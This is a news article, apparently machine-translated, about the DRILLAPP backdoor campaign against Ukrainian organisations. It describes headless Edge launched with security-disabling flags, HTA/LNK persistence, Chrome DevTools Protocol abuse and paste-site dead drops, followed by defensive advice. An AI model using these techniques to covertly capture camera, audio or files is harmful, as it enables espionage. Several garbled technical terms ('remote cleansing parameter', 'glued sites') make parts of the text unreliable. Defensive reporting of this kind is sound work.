DRILLAPP The browser as a back door for espionage and exfiltration of data

A Spanish threat intelligence team has described a recent campaign that has focused on Ukrainian organizations and, by its modus operandi, points to actors with possible links to previously documented Russian groups. The analysis published by LAB52 of S2 Group It baptizes the malicious piece as DRILLAPP and places the initial observation in February 2026, although early traces date back to the end of January.

The most striking of this campaign is the use of the browser as a vector of execution and persistence. Instead of using traditional executables, attackers take advantage of seemingly legitimate access to the Edge browser - by launching it in "headless" mode with parameters that deactivate the protections - to run an ofuscado JavaScript code hosted in public-taped services such as Pastefy. By enabling flags like No sandbox, -disable-web-security or -use-fake-ui-for-media-stream, the browser process gets permissions that would normally be restricted: file system access, camera and microphone capture, and screen recording without user intervention. To understand in general terms what it means to run a browser in this mode you can see the entry on headless browsers.

The first observed vector combined direct Windows (.LNK) accesses with temporary HTML (HTA) applications that downloaded and ran the remote script. The shortcuts were copied to the Windows Start folder to ensure rerun after a reboot. In a later iteration the operators changed the tactic and resorted to modules of the Control Panel, however maintaining the chain of infection essentially the same. The change was not just in transport: the back door evolved and began to offer more robust functions, such as recursive file enumeration, mass uploads and arbitrary file download.

From a technical point of view, the attackers have overcome limitations of the JavaScript environment itself by using the Chrome DevTools Protocol (CDP), an internal protocol of Chromium-based browsers that, when exposed by the remote cleansing parameter, allows actions that standard JavaScript cannot perform by itself, including remote file download. This CDP dependence is a clear lead on how the surface of browsers is being exploited to skip security restrictions designed precisely to prevent such abuses.

DRILLAPP operates as a light back door that, in addition to maintaining files and communicating with a command and control server, incorporates multimedia espionage capabilities: audio capture, camera images and screen capture. In its first execution it collects a "footprint" of the device using techniques such as the coves and sends this information together with an identification of the country inferred from the time zone of the system. The code contains an explicit list of time zones of interest - including Ukraine, the United Kingdom, Russia, USA. The United States and several European and Asian countries - and if it does not detect any, it assumes by default the US. United States.

To hide the actual address of the control server, attackers use glued sites as "dead drop solutions" that return a WebSocket URL that malware uses to maintain communication. LAB52 also documents an early variant that, instead of Pastefy, communicated with an apparently generic domain ("gnome [.] com"), suggesting experimentation and active development of the toolkit.

The use of the browser as a vector has practical reasons for an attacker: browsers are common processes in systems, their presence does not arouse immediate suspicion and, when run with certain parameters, offer direct access to sensitive resources that under normal conditions would require interaction and explicit permissions. That makes the browser an attractive platform for undercover escape and exfiltration techniques.

What can an organization do to reduce the risk of such attacks? First, it is appropriate to monitor abnormal patterns such as Edge or Chrome instances launched with remote or sandbox-free debugging parameters, and to control changes in start folders and the loading of control panel modules that do not have administrative justification. Corporate navigation policies should restrict the execution of HTA and block or inspect outgoing communications to glue and dynamic repository services used as dead drops. The application of strict camera and microphone permit controls, along with EDR solutions that detect browser processes that open unusual sockets or access atypical to the file system, also helps to reduce the attack surface.

For those who want to deepen the technical explanation and the IOCs, the original LAB52 report is the direct reference to this campaign: DRILLAPP - LAB52 report. If the campaign uses lures related to civil initiatives or aid organizations, it is important to compare links and pages with official sources, for example the Come Back Alive Foundation ( savelife.in.ua) or legitimate services such as Starlink to avoid falling into fraudulent pages.

In broader terms, the incident recalls that tools widely used in the daily infrastructure - browsers, gluing services or debugging functions - can become weapons if they are not monitored and configured with safety criteria. The threat is both technical and social: it combines social engineering (thematic lures) with abuse of legitimate software capabilities and at that crossing lies its effectiveness.

The final recommendation for IT managers and users is to maintain a proactive posture: update and harden browsers and running policies, audit processes that start at boot, and have detection capabilities that distinguish an ordinary browser process from one that behaves as a data collection and exfiltration agent. The publication of LAB52 provides details for those teams that need to identify specific indicators and adjust controls in their environments.